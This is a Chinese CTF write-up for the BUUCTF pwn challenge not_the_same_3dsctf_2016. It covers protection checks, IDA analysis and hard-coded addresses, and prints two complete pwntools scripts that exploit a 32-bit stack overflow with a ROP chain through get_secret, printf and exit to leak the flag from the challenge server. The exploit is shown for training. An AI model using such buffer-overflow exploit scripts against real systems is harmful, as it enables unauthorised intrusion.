news 2026/6/10 16:42:23

buuctf中的not_the_same_3dsctf_2016

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
buuctf中的not_the_same_3dsctf_2016

首先checksec检查保护机制:

-32位程序

-仅开启了栈不可执行保护

然后使用IDA反汇编工具进行分析:

main函数中有栈溢出漏洞可利用,左边有get_secret函数,同时看出v4到栈底的偏移为45,原本需要填充49字节的垃圾数据,但是最终实验只需要45个字节的垃圾数据

这是get_secret函数内部:

这里打开了flag.txt文本文件,这几行代码的作用就是将flag.txt中的内容写入到fl4g这个变量中去,想就是flag了吧,但是发现我们还得自己去调用printf函数将fl4g的内容打印出来才能拿到flag

这里先拿到flag变量的地址:0x080ECA2D

get_secret函数的地址:0x080489A0

在IDA中找到printf函数的地址:0x0804F0A0

由于栈溢出执行完printf函数后需要正常退出才能打印出flag的值,所以还需用到exit函数的地址,同样在IDA中拿到:0x0804E660

这是exp攻击脚本:

payload需要先执行get_secret函数将flag读取到对应的变量中后我们再将这个变量的值printf出来

from pwn import * context(arch='i386', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',26609) # 与在线环境交互。 printf_addr = 0x0804F0A0 get_secret_addr = 0x080489A0 flag_addr = 0x080ECA2D exit_addr = 0x0804E660 offset = 45 payload = b'a'*offset + p32(get_secret_addr) +p32(printf_addr) + p32(exit_addr) + p32(flag_addr) io.sendline(payload) io.interactive()

在IDA中一个一个找函数的地址如果嫌太麻烦的话,攻击脚本还可以这样写:

from pwn import * context(arch='i386', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',26609) # 与在线环境交互。 elf = ELF('./pwn') get_secret_addr = elf.symbols["get_secret"] printf_addr = elf.symbols["printf"] exit_addr = elf.symbols["exit"] flag_addr = 0x080ECA2D offset = 45 payload = b'a'*offset+p32(get_secret_addr)+p32(printf_addr)+p32(exit_addr)+p32(flag_addr) io.sendline(payload) io.interactive()

这是运行结果:

-成功打印出flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 11:14:40

快速部署wvp-GB28181-pro:打造专业级视频监控平台完整指南

你是否曾经为了搭建一个企业级视频监控系统而头疼不已?面对海康、大华等不同品牌设备,如何实现统一管理?今天,我将为你揭秘一个基于GB28181标准的开源解决方案——wvp-GB28181-pro视频监控平台。 【免费下载链接】wvp-GB28181-pro…

作者头像 李华
网站建设 2026/6/9 20:14:42

色彩工程的演进:从RGB到Oklab的现代化之路

在数字色彩处理的发展历程中,我们见证了一场从简单通道混合到感知均匀空间的深刻变革。早期的RGB色彩空间虽然直接映射硬件显示机制,却在色彩感知层面存在显著缺陷。当开发者试图在红色与蓝色之间创建渐变时,往往会出现非预期的灰紫色过渡&am…

作者头像 李华
网站建设 2026/6/9 22:02:31

打破数字壁垒:dupeGuru如何通过NVDA测试成为视障用户的得力助手

打破数字壁垒:dupeGuru如何通过NVDA测试成为视障用户的得力助手 【免费下载链接】dupeguru Find duplicate files 项目地址: https://gitcode.com/gh_mirrors/du/dupeguru 还在为海量重复文件困扰,却担心屏幕阅读器无法兼容?dupeGuru作…

作者头像 李华
网站建设 2026/6/10 9:14:29

Obsidian Templater插件:重新定义知识管理的自动化边界

Obsidian Templater插件:重新定义知识管理的自动化边界 【免费下载链接】Templater A template plugin for obsidian 项目地址: https://gitcode.com/gh_mirrors/te/Templater 在信息过载的时代,知识工作者面临着一个核心挑战:如何在保…

作者头像 李华
网站建设 2026/6/10 14:23:43

GroundingDINO模型配置文件解析:SwinT与SwinB深度对比与实战选择指南

GroundingDINO模型配置文件解析:SwinT与SwinB深度对比与实战选择指南 【免费下载链接】GroundingDINO 论文 Grounding DINO: 将DINO与基于地面的预训练结合用于开放式目标检测 的官方实现。 项目地址: https://gitcode.com/GitHub_Trending/gr/GroundingDINO …

作者头像 李华
网站建设 2026/6/10 11:48:48

stm32f103c8t6使用STM32CubeMX配置IAP

单片机IAP(In Application Programming,在线应用编程)是一种允许用户程序在运行过程中直接对Flash存储器进行读写操作的功能,主要用于产品发布后的固件升级。‌‌简单来说,就是设备在正常工作状态下,无需借…

作者头像 李华